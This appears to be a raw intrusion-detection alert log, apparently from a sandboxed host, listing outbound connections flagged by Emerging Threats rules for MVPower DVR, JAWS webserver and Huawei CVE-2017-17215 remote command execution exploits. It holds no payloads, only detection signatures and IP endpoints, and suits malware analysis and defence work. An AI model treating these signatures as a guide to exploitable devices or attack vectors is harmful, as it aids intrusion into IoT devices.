                                                          192.168.2.232.136.180.9132958802025883 01/02/24-06:24:20.174770TCP2025883ET EXPLOIT MVPower DVR Shell UCE3295880192.168.2.232.136.180.91
                                                          192.168.2.23208.70.77.18137854802025883 01/02/24-06:24:43.121132TCP2025883ET EXPLOIT MVPower DVR Shell UCE3785480192.168.2.23208.70.77.181
                                                          192.168.2.23156.235.102.23034064372152829579 01/02/24-06:23:48.382924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3406437215192.168.2.23156.235.102.230
                                                          192.168.2.2377.74.207.20352380802025883 01/02/24-06:25:35.073405TCP2025883ET EXPLOIT MVPower DVR Shell UCE5238080192.168.2.2377.74.207.203
                                                          192.168.2.23104.114.164.4947672802030092 01/02/24-06:25:25.169174TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4767280192.168.2.23104.114.164.49
                                                          192.168.2.23197.26.81.356728802030092 01/02/24-06:24:49.038851TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5672880192.168.2.23197.26.81.3
                                                          192.168.2.2362.202.156.24135188802030092 01/02/24-06:24:17.662475TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3518880192.168.2.2362.202.156.241
                                                          192.168.2.23121.4.183.14448996802025883 01/02/24-06:25:19.173099TCP2025883ET EXPLOIT MVPower DVR Shell UCE4899680192.168.2.23121.4.183.144
                                                          192.168.2.2352.35.155.16647130802025883 01/02/24-06:25:42.678669TCP2025883ET EXPLOIT MVPower DVR Shell UCE4713080192.168.2.2352.35.155.166
                                                          192.168.2.2382.165.119.13360268802030092 01/02/24-06:24:19.252681TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6026880192.168.2.2382.165.119.133
                                                          192.168.2.2323.37.135.6550062802030092 01/02/24-06:24:03.045010TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5006280192.168.2.2323.37.135.65
                                                          192.168.2.23181.206.2.4650076802030092 01/02/24-06:24:03.265616TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5007680192.168.2.23181.206.2.46
                                                          192.168.2.2344.215.139.22838962802030092 01/02/24-06:25:42.024128TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3896280192.168.2.2344.215.139.228
                                                          192.168.2.23175.126.123.11658590802025883 01/02/24-06:25:04.257669TCP2025883ET EXPLOIT MVPower DVR Shell UCE5859080192.168.2.23175.126.123.116
                                                          192.168.2.2354.179.83.5233844802030092 01/02/24-06:25:04.468216TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3384480192.168.2.2354.179.83.52
                                                          192.168.2.2352.24.96.4456028802030092 01/02/24-06:25:04.184391TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5602880192.168.2.2352.24.96.44
                                                          192.168.2.23142.93.144.23436246802030092 01/02/24-06:24:36.837939TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3624680192.168.2.23142.93.144.234
                                                          192.168.2.23104.75.225.9144926802030092 01/02/24-06:24:58.708367TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4492680192.168.2.23104.75.225.91
                                                          192.168.2.23146.71.40.21548486802030092 01/02/24-06:24:05.866440TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4848680192.168.2.23146.71.40.215
                                                          192.168.2.2323.231.34.9059060802025883 01/02/24-06:24:27.279281TCP2025883ET EXPLOIT MVPower DVR Shell UCE5906080192.168.2.2323.231.34.90
                                                          192.168.2.23109.168.109.22945120802025883 01/02/24-06:23:56.151964TCP2025883ET EXPLOIT MVPower DVR Shell UCE4512080192.168.2.23109.168.109.229
                                                          192.168.2.23156.235.98.939512372152829579 01/02/24-06:24:15.985357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951237215192.168.2.23156.235.98.9
                                                          192.168.2.2313.244.84.14656714802030092 01/02/24-06:24:09.228401TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5671480192.168.2.2313.244.84.146
                                                          192.168.2.23103.141.149.9046528802025883 01/02/24-06:24:19.516603TCP2025883ET EXPLOIT MVPower DVR Shell UCE4652880192.168.2.23103.141.149.90
                                                          192.168.2.23174.71.165.22954816802030092 01/02/24-06:24:51.730581TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5481680192.168.2.23174.71.165.229
                                                          192.168.2.23210.136.185.6435820802025883 01/02/24-06:25:42.761377TCP2025883ET EXPLOIT MVPower DVR Shell UCE3582080192.168.2.23210.136.185.64
                                                          192.168.2.23207.60.214.5343892802030092 01/02/24-06:23:58.146252TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4389280192.168.2.23207.60.214.53
                                                          192.168.2.2327.54.141.22460562802030092 01/02/24-06:24:30.783293TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6056280192.168.2.2327.54.141.224
                                                          192.168.2.23156.254.75.5454612372152835222 01/02/24-06:25:31.710967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5461237215192.168.2.23156.254.75.54
                                                          192.168.2.23185.204.186.16245770802030092 01/02/24-06:24:24.014425TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4577080192.168.2.23185.204.186.162
                                                          192.168.2.2381.45.23.21550156802025883 01/02/24-06:25:39.133513TCP2025883ET EXPLOIT MVPower DVR Shell UCE5015680192.168.2.2381.45.23.215
                                                          192.168.2.2345.91.92.17553294802025883 01/02/24-06:25:42.747930TCP2025883ET EXPLOIT MVPower DVR Shell UCE5329480192.168.2.2345.91.92.175
                                                          192.168.2.2352.208.51.24237438802025883 01/02/24-06:24:46.160935TCP2025883ET EXPLOIT MVPower DVR Shell UCE3743880192.168.2.2352.208.51.242
                                                          192.168.2.23157.90.166.540292802025883 01/02/24-06:25:26.148693TCP2025883ET EXPLOIT MVPower DVR Shell UCE4029280192.168.2.23157.90.166.5
                                                          192.168.2.2347.96.31.6043368802025883 01/02/24-06:24:32.931561TCP2025883ET EXPLOIT MVPower DVR Shell UCE4336880192.168.2.2347.96.31.60
                                                          192.168.2.232.189.137.1749444802030092 01/02/24-06:25:04.484177TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4944480192.168.2.232.189.137.17
                                                          192.168.2.2389.218.57.12838636802025883 01/02/24-06:23:50.310617TCP2025883ET EXPLOIT MVPower DVR Shell UCE3863680192.168.2.2389.218.57.128
                                                          192.168.2.23202.43.100.11357888802025883 01/02/24-06:24:43.056570TCP2025883ET EXPLOIT MVPower DVR Shell UCE5788880192.168.2.23202.43.100.113
                                                          192.168.2.23202.75.103.11733286802030092 01/02/24-06:24:31.278952TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3328680192.168.2.23202.75.103.117
                                                          192.168.2.2323.209.26.22960854802025883 01/02/24-06:24:32.802584TCP2025883ET EXPLOIT MVPower DVR Shell UCE6085480192.168.2.2323.209.26.229
                                                          192.168.2.23104.24.209.20437990802030092 01/02/24-06:25:29.545650TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3799080192.168.2.23104.24.209.204
                                                          192.168.2.2337.97.157.9157446802030092 01/02/24-06:25:34.999588TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5744680192.168.2.2337.97.157.91
                                                          192.168.2.2313.52.177.10058232802030092 01/02/24-06:24:00.958032TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5823280192.168.2.2313.52.177.100
                                                          192.168.2.2341.111.241.3452770802025883 01/02/24-06:25:30.188511TCP2025883ET EXPLOIT MVPower DVR Shell UCE5277080192.168.2.2341.111.241.34
                                                          192.168.2.23154.37.215.11352664802030092 01/02/24-06:25:06.760411TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5266480192.168.2.23154.37.215.113
                                                          192.168.2.2377.223.119.15053212802030092 01/02/24-06:25:25.284668TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5321280192.168.2.2377.223.119.150
                                                          192.168.2.23202.88.191.10458160802025883 01/02/24-06:23:59.400873TCP2025883ET EXPLOIT MVPower DVR Shell UCE5816080192.168.2.23202.88.191.104
                                                          192.168.2.2323.217.78.18433170802025883 01/02/24-06:25:04.964747TCP2025883ET EXPLOIT MVPower DVR Shell UCE3317080192.168.2.2323.217.78.184
                                                          192.168.2.23192.126.242.16243294802025883 01/02/24-06:25:09.578837TCP2025883ET EXPLOIT MVPower DVR Shell UCE4329480192.168.2.23192.126.242.162
                                                          192.168.2.2345.15.66.2040310802025883 01/02/24-06:24:05.830727TCP2025883ET EXPLOIT MVPower DVR Shell UCE4031080192.168.2.2345.15.66.20
                                                          192.168.2.23104.73.17.2758458802030092 01/02/24-06:24:01.120240TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5845880192.168.2.23104.73.17.27
                                                          192.168.2.23104.79.255.2941640802030092 01/02/24-06:24:05.776321TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4164080192.168.2.23104.79.255.29
                                                          192.168.2.2352.218.179.4559110802030092 01/02/24-06:25:34.705547TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5911080192.168.2.2352.218.179.45
                                                          192.168.2.2367.160.112.10851240802025883 01/02/24-06:25:15.888424TCP2025883ET EXPLOIT MVPower DVR Shell UCE5124080192.168.2.2367.160.112.108
                                                          192.168.2.23149.57.79.10232814802030092 01/02/24-06:23:51.958904TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3281480192.168.2.23149.57.79.102
                                                          192.168.2.23185.79.154.21054452802025883 01/02/24-06:24:58.941620TCP2025883ET EXPLOIT MVPower DVR Shell UCE5445280192.168.2.23185.79.154.210
                                                          192.168.2.2318.140.253.6745590802025883 01/02/24-06:25:35.354970TCP2025883ET EXPLOIT MVPower DVR Shell UCE4559080192.168.2.2318.140.253.67
                                                          192.168.2.23109.109.200.17557970802030092 01/02/24-06:24:01.322259TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5797080192.168.2.23109.109.200.175
                                                          192.168.2.2351.210.249.6660948802025883 01/02/24-06:24:52.075605TCP2025883ET EXPLOIT MVPower DVR Shell UCE6094880192.168.2.2351.210.249.66
                                                          192.168.2.2375.187.170.24035348802025883 01/02/24-06:24:30.620216TCP2025883ET EXPLOIT MVPower DVR Shell UCE3534880192.168.2.2375.187.170.240
                                                          192.168.2.23216.172.159.3643926802030092 01/02/24-06:25:37.943407TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4392680192.168.2.23216.172.159.36
                                                          192.168.2.23107.149.236.15149944802025883 01/02/24-06:24:54.829093TCP2025883ET EXPLOIT MVPower DVR Shell UCE4994480192.168.2.23107.149.236.151
                                                          192.168.2.2338.55.173.24453040802030092 01/02/24-06:23:51.512013TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5304080192.168.2.2338.55.173.244
                                                          192.168.2.2388.151.101.14851274802025883 01/02/24-06:25:35.254797TCP2025883ET EXPLOIT MVPower DVR Shell UCE5127480192.168.2.2388.151.101.148
                                                          192.168.2.23193.46.47.24236186802025883 01/02/24-06:25:30.204860TCP2025883ET EXPLOIT MVPower DVR Shell UCE3618680192.168.2.23193.46.47.242
                                                          192.168.2.23191.96.205.19456586802025883 01/02/24-06:24:13.903880TCP2025883ET EXPLOIT MVPower DVR Shell UCE5658680192.168.2.23191.96.205.194
                                                          192.168.2.2342.237.113.22243184802025883 01/02/24-06:24:52.311736TCP2025883ET EXPLOIT MVPower DVR Shell UCE4318480192.168.2.2342.237.113.222
                                                          192.168.2.2337.32.125.6150126802030092 01/02/24-06:24:18.097501TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5012680192.168.2.2337.32.125.61
                                                          192.168.2.23197.26.86.8560062802025883 01/02/24-06:25:19.114868TCP2025883ET EXPLOIT MVPower DVR Shell UCE6006280192.168.2.23197.26.86.85
                                                          192.168.2.2361.221.104.22858714802030092 01/02/24-06:25:43.149492TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5871480192.168.2.2361.221.104.228
                                                          192.168.2.23104.25.137.9540366802025883 01/02/24-06:24:34.920245TCP2025883ET EXPLOIT MVPower DVR Shell UCE4036680192.168.2.23104.25.137.95
                                                          192.168.2.2323.57.244.12937714802025883 01/02/24-06:25:07.005656TCP2025883ET EXPLOIT MVPower DVR Shell UCE3771480192.168.2.2323.57.244.129
                                                          192.168.2.23213.29.227.25034468802025883 01/02/24-06:24:19.265733TCP2025883ET EXPLOIT MVPower DVR Shell UCE3446880192.168.2.23213.29.227.250
                                                          192.168.2.2385.126.165.10351920802025883 01/02/24-06:25:29.714738TCP2025883ET EXPLOIT MVPower DVR Shell UCE5192080192.168.2.2385.126.165.103
                                                          192.168.2.23201.192.158.13039898802025883 01/02/24-06:25:34.727412TCP2025883ET EXPLOIT MVPower DVR Shell UCE3989880192.168.2.23201.192.158.130
                                                          192.168.2.23172.245.174.8046628802030092 01/02/24-06:24:17.912872TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4662880192.168.2.23172.245.174.80
                                                          192.168.2.23104.230.152.22549862802030092 01/02/24-06:24:23.652013TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4986280192.168.2.23104.230.152.225
                                                          192.168.2.23220.137.212.6059920802025883 01/02/24-06:25:15.748234TCP2025883ET EXPLOIT MVPower DVR Shell UCE5992080192.168.2.23220.137.212.60
                                                          192.168.2.2390.79.11.6051570802025883 01/02/24-06:25:21.019509TCP2025883ET EXPLOIT MVPower DVR Shell UCE5157080192.168.2.2390.79.11.60
                                                          192.168.2.23172.67.240.21640034802030092 01/02/24-06:25:29.545694TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4003480192.168.2.23172.67.240.216
                                                          192.168.2.23118.99.59.24958056802025883 01/02/24-06:24:31.063069TCP2025883ET EXPLOIT MVPower DVR Shell UCE5805680192.168.2.23118.99.59.249
                                                          192.168.2.23170.130.122.6435776802030092 01/02/24-06:25:42.642200TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3577680192.168.2.23170.130.122.64
                                                          192.168.2.23148.72.211.16752086802030092 01/02/24-06:24:45.420651TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5208680192.168.2.23148.72.211.167
                                                          192.168.2.2352.1.227.24732976802025883 01/02/24-06:25:31.234449TCP2025883ET EXPLOIT MVPower DVR Shell UCE3297680192.168.2.2352.1.227.247
                                                          192.168.2.23121.128.130.643932802025883 01/02/24-06:24:56.157594TCP2025883ET EXPLOIT MVPower DVR Shell UCE4393280192.168.2.23121.128.130.6
                                                          192.168.2.2334.233.79.10139524802030092 01/02/24-06:24:40.913375TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3952480192.168.2.2334.233.79.101
                                                          192.168.2.2399.80.176.12533828802025883 01/02/24-06:25:00.994557TCP2025883ET EXPLOIT MVPower DVR Shell UCE3382880192.168.2.2399.80.176.125
                                                          192.168.2.23104.21.5.8858690802025883 01/02/24-06:24:30.711855TCP2025883ET EXPLOIT MVPower DVR Shell UCE5869080192.168.2.23104.21.5.88
                                                          192.168.2.2351.178.25.2639996802030092 01/02/24-06:25:19.073342TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3999680192.168.2.2351.178.25.26
                                                          192.168.2.2335.187.108.16953570802025883 01/02/24-06:25:21.019391TCP2025883ET EXPLOIT MVPower DVR Shell UCE5357080192.168.2.2335.187.108.169
                                                          192.168.2.23176.112.147.6145918802030092 01/02/24-06:24:56.122079TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4591880192.168.2.23176.112.147.61
                                                          192.168.2.2335.183.50.13935316802030092 01/02/24-06:25:42.350384TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3531680192.168.2.2335.183.50.139
                                                          192.168.2.23211.149.152.3757174802025883 01/02/24-06:25:42.230065TCP2025883ET EXPLOIT MVPower DVR Shell UCE5717480192.168.2.23211.149.152.37
                                                          192.168.2.23104.97.11.2460650802030092 01/02/24-06:25:22.089353TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6065080192.168.2.23104.97.11.24
                                                          192.168.2.2337.1.204.6437102802030092 01/02/24-06:25:29.908844TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3710280192.168.2.2337.1.204.64
                                                          192.168.2.23156.247.18.9351712372152829579 01/02/24-06:23:49.692291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5171237215192.168.2.23156.247.18.93
                                                          192.168.2.2323.194.37.21755520802030092 01/02/24-06:23:55.440502TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5552080192.168.2.2323.194.37.217
                                                          192.168.2.23104.71.83.3248722802025883 01/02/24-06:25:16.196517TCP2025883ET EXPLOIT MVPower DVR Shell UCE4872280192.168.2.23104.71.83.32
                                                          192.168.2.2335.183.139.12937922802030092 01/02/24-06:25:29.610631TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3792280192.168.2.2335.183.139.129
                                                          192.168.2.2318.133.47.14241080802030092 01/02/24-06:25:11.803956TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4108080192.168.2.2318.133.47.142
                                                          192.168.2.2374.48.170.2654894802030092 01/02/24-06:24:48.887995TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5489480192.168.2.2374.48.170.26
                                                          192.168.2.23213.92.76.14950818802025883 01/02/24-06:25:32.164890TCP2025883ET EXPLOIT MVPower DVR Shell UCE5081880192.168.2.23213.92.76.149
                                                          192.168.2.2345.243.32.10952362802025883 01/02/24-06:25:05.266557TCP2025883ET EXPLOIT MVPower DVR Shell UCE5236280192.168.2.2345.243.32.109
                                                          192.168.2.23185.179.157.10256368802025883 01/02/24-06:24:10.926344TCP2025883ET EXPLOIT MVPower DVR Shell UCE5636880192.168.2.23185.179.157.102
                                                          192.168.2.2346.175.16.20649032802030092 01/02/24-06:24:48.996752TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4903280192.168.2.2346.175.16.206
                                                          192.168.2.2377.46.139.24443154802030092 01/02/24-06:25:02.038352TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4315480192.168.2.2377.46.139.244
                                                          192.168.2.2385.50.165.3759160802030092 01/02/24-06:24:24.106651TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5916080192.168.2.2385.50.165.37
                                                          192.168.2.2323.78.13.16036348802030092 01/02/24-06:23:58.964776TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3634880192.168.2.2323.78.13.160
                                                          192.168.2.23146.75.21.14359376802025883 01/02/24-06:24:45.316760TCP2025883ET EXPLOIT MVPower DVR Shell UCE5937680192.168.2.23146.75.21.143
                                                          192.168.2.2318.65.143.9547196802025883 01/02/24-06:25:12.172054TCP2025883ET EXPLOIT MVPower DVR Shell UCE4719680192.168.2.2318.65.143.95
                                                          192.168.2.23203.170.84.9841608802025883 01/02/24-06:24:05.853329TCP2025883ET EXPLOIT MVPower DVR Shell UCE4160880192.168.2.23203.170.84.98
                                                          192.168.2.23114.55.243.17648672802025883 01/02/24-06:25:22.179481TCP2025883ET EXPLOIT MVPower DVR Shell UCE4867280192.168.2.23114.55.243.176
                                                          192.168.2.2387.255.233.5348182802030092 01/02/24-06:24:08.655481TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4818280192.168.2.2387.255.233.53
                                                          192.168.2.2346.101.108.16542208802030092 01/02/24-06:24:24.183226TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4220880192.168.2.2346.101.108.165
                                                          192.168.2.2386.181.28.25240796802025883 01/02/24-06:24:28.186813TCP2025883ET EXPLOIT MVPower DVR Shell UCE4079680192.168.2.2386.181.28.252
                                                          192.168.2.23101.42.123.6038286802025883 01/02/24-06:23:49.854020TCP2025883ET EXPLOIT MVPower DVR Shell UCE3828680192.168.2.23101.42.123.60
                                                          192.168.2.23173.224.201.17554220802030092 01/02/24-06:24:23.810709TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5422080192.168.2.23173.224.201.175
                                                          192.168.2.23104.19.229.17639714802030092 01/02/24-06:24:40.719393TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3971480192.168.2.23104.19.229.176
                                                          192.168.2.23174.84.210.335298802030092 01/02/24-06:25:31.914564TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3529880192.168.2.23174.84.210.3
                                                          192.168.2.23154.92.226.19933136802025883 01/02/24-06:24:13.806614TCP2025883ET EXPLOIT MVPower DVR Shell UCE3313680192.168.2.23154.92.226.199
                                                          192.168.2.2338.181.35.21934152802030092 01/02/24-06:23:55.217292TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3415280192.168.2.2338.181.35.219
                                                          192.168.2.23104.93.2.11952484802025883 01/02/24-06:24:52.173461TCP2025883ET EXPLOIT MVPower DVR Shell UCE5248480192.168.2.23104.93.2.119
                                                          192.168.2.23104.107.28.1660550802025883 01/02/24-06:23:51.391248TCP2025883ET EXPLOIT MVPower DVR Shell UCE6055080192.168.2.23104.107.28.16
                                                          192.168.2.2345.56.102.14636664802025883 01/02/24-06:24:56.015984TCP2025883ET EXPLOIT MVPower DVR Shell UCE3666480192.168.2.2345.56.102.146
                                                          192.168.2.2334.126.113.7654070802030092 01/02/24-06:25:15.540979TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5407080192.168.2.2334.126.113.76
                                                          192.168.2.23185.110.26.8256372802030092 01/02/24-06:24:19.276074TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5637280192.168.2.23185.110.26.82
                                                          192.168.2.23154.221.82.22160596802030092 01/02/24-06:25:02.335948TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6059680192.168.2.23154.221.82.221
                                                          192.168.2.2313.249.87.5444040802030092 01/02/24-06:24:23.621355TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4404080192.168.2.2313.249.87.54
                                                          192.168.2.2318.66.27.18250544802025883 01/02/24-06:24:59.193137TCP2025883ET EXPLOIT MVPower DVR Shell UCE5054480192.168.2.2318.66.27.182
                                                          192.168.2.23149.155.143.6259544802030092 01/02/24-06:25:25.272485TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5954480192.168.2.23149.155.143.62
                                                          192.168.2.2323.43.229.22859784802025883 01/02/24-06:23:58.287305TCP2025883ET EXPLOIT MVPower DVR Shell UCE5978480192.168.2.2323.43.229.228
                                                          192.168.2.2331.30.58.13333052802030092 01/02/24-06:24:10.909503TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3305280192.168.2.2331.30.58.133
                                                          192.168.2.2351.68.46.2342144802030092 01/02/24-06:24:54.912247TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4214480192.168.2.2351.68.46.23
                                                          192.168.2.23212.8.247.7039420802030092 01/02/24-06:24:59.257113TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3942080192.168.2.23212.8.247.70
                                                          192.168.2.23154.208.198.21441798802030092 01/02/24-06:24:45.035888TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4179880192.168.2.23154.208.198.214
                                                          192.168.2.2337.221.198.8650826802030092 01/02/24-06:25:24.777893TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5082680192.168.2.2337.221.198.86
                                                          192.168.2.23173.242.127.8135322802025883 01/02/24-06:25:25.176699TCP2025883ET EXPLOIT MVPower DVR Shell UCE3532280192.168.2.23173.242.127.81
                                                          192.168.2.2350.19.25.18857882802030092 01/02/24-06:24:17.916928TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5788280192.168.2.2350.19.25.188
                                                          192.168.2.2377.242.107.19653440802025883 01/02/24-06:25:25.327513TCP2025883ET EXPLOIT MVPower DVR Shell UCE5344080192.168.2.2377.242.107.196
                                                          192.168.2.23152.67.216.18058250802025883 01/02/24-06:24:09.004126TCP2025883ET EXPLOIT MVPower DVR Shell UCE5825080192.168.2.23152.67.216.180
                                                          192.168.2.23103.50.160.13953436802025883 01/02/24-06:24:30.812927TCP2025883ET EXPLOIT MVPower DVR Shell UCE5343680192.168.2.23103.50.160.139
                                                          192.168.2.2352.50.137.22941178802025883 01/02/24-06:24:03.282074TCP2025883ET EXPLOIT MVPower DVR Shell UCE4117880192.168.2.2352.50.137.229
                                                          192.168.2.232.16.231.22546374802025883 01/02/24-06:24:45.225996TCP2025883ET EXPLOIT MVPower DVR Shell UCE4637480192.168.2.232.16.231.225
                                                          192.168.2.23146.75.63.13352912802025883 01/02/24-06:23:55.171237TCP2025883ET EXPLOIT MVPower DVR Shell UCE5291280192.168.2.23146.75.63.133
                                                          192.168.2.2352.196.15.13145438802025883 01/02/24-06:25:02.277841TCP2025883ET EXPLOIT MVPower DVR Shell UCE4543880192.168.2.2352.196.15.131
                                                          192.168.2.23157.52.181.6140930802025883 01/02/24-06:25:29.722171TCP2025883ET EXPLOIT MVPower DVR Shell UCE4093080192.168.2.23157.52.181.61
                                                          192.168.2.23104.105.18.18246624802030092 01/02/24-06:24:13.802828TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4662480192.168.2.23104.105.18.182
                                                          192.168.2.23204.152.46.6744196802025883 01/02/24-06:24:40.815829TCP2025883ET EXPLOIT MVPower DVR Shell UCE4419680192.168.2.23204.152.46.67
                                                          192.168.2.23184.85.129.25155542802025883 01/02/24-06:24:01.334668TCP2025883ET EXPLOIT MVPower DVR Shell UCE5554280192.168.2.23184.85.129.251
                                                          192.168.2.23121.11.37.23456708802025883 01/02/24-06:24:50.567237TCP2025883ET EXPLOIT MVPower DVR Shell UCE5670880192.168.2.23121.11.37.234
                                                          192.168.2.23125.229.151.23948022802025883 01/02/24-06:23:54.655329TCP2025883ET EXPLOIT MVPower DVR Shell UCE4802280192.168.2.23125.229.151.239
                                                          192.168.2.23107.158.48.17360248802025883 01/02/24-06:25:24.657251TCP2025883ET EXPLOIT MVPower DVR Shell UCE6024880192.168.2.23107.158.48.173
                                                          192.168.2.2335.244.131.839990802025883 01/02/24-06:25:34.794177TCP2025883ET EXPLOIT MVPower DVR Shell UCE3999080192.168.2.2335.244.131.8
                                                          192.168.2.23191.82.53.4348036802030092 01/02/24-06:24:27.438039TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4803680192.168.2.23191.82.53.43
                                                          192.168.2.2354.211.17.19052204802025883 01/02/24-06:23:51.955510TCP2025883ET EXPLOIT MVPower DVR Shell UCE5220480192.168.2.2354.211.17.190
                                                          192.168.2.2318.67.147.1742596802030092 01/02/24-06:25:34.896348TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4259680192.168.2.2318.67.147.17
                                                          192.168.2.23190.167.115.16244810802030092 01/02/24-06:23:55.091590TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4481080192.168.2.23190.167.115.162
                                                          192.168.2.23156.254.100.15556258372152835222 01/02/24-06:24:45.346010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625837215192.168.2.23156.254.100.155
                                                          192.168.2.2318.208.8.11543682802030092 01/02/24-06:25:15.875600TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4368280192.168.2.2318.208.8.115
                                                          192.168.2.23154.219.183.10247752802025883 01/02/24-06:25:34.822358TCP2025883ET EXPLOIT MVPower DVR Shell UCE4775280192.168.2.23154.219.183.102
                                                          192.168.2.23111.87.115.15347612802030092 01/02/24-06:25:25.281636TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4761280192.168.2.23111.87.115.153
                                                          192.168.2.23220.134.218.24855228802030092 01/02/24-06:23:51.508732TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5522880192.168.2.23220.134.218.248
                                                          192.168.2.23114.33.8.1834070802025883 01/02/24-06:25:18.822764TCP2025883ET EXPLOIT MVPower DVR Shell UCE3407080192.168.2.23114.33.8.18
                                                          192.168.2.2398.123.179.9836228802025883 01/02/24-06:24:08.556843TCP2025883ET EXPLOIT MVPower DVR Shell UCE3622880192.168.2.2398.123.179.98
                                                          192.168.2.2394.250.243.644720802030092 01/02/24-06:24:27.687612TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4472080192.168.2.2394.250.243.6
                                                          192.168.2.2352.204.79.20242440802030092 01/02/24-06:25:11.888955TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4244080192.168.2.2352.204.79.202
                                                          192.168.2.23211.253.8.10738410802025883 01/02/24-06:25:02.050528TCP2025883ET EXPLOIT MVPower DVR Shell UCE3841080192.168.2.23211.253.8.107
                                                          192.168.2.2323.50.91.16934304802030092 01/02/24-06:25:25.361156TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3430480192.168.2.2323.50.91.169
                                                          192.168.2.23159.69.20.6060990802030092 01/02/24-06:23:51.599206TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6099080192.168.2.23159.69.20.60
                                                          192.168.2.2323.221.123.6153238802025883 01/02/24-06:25:30.014297TCP2025883ET EXPLOIT MVPower DVR Shell UCE5323880192.168.2.2323.221.123.61
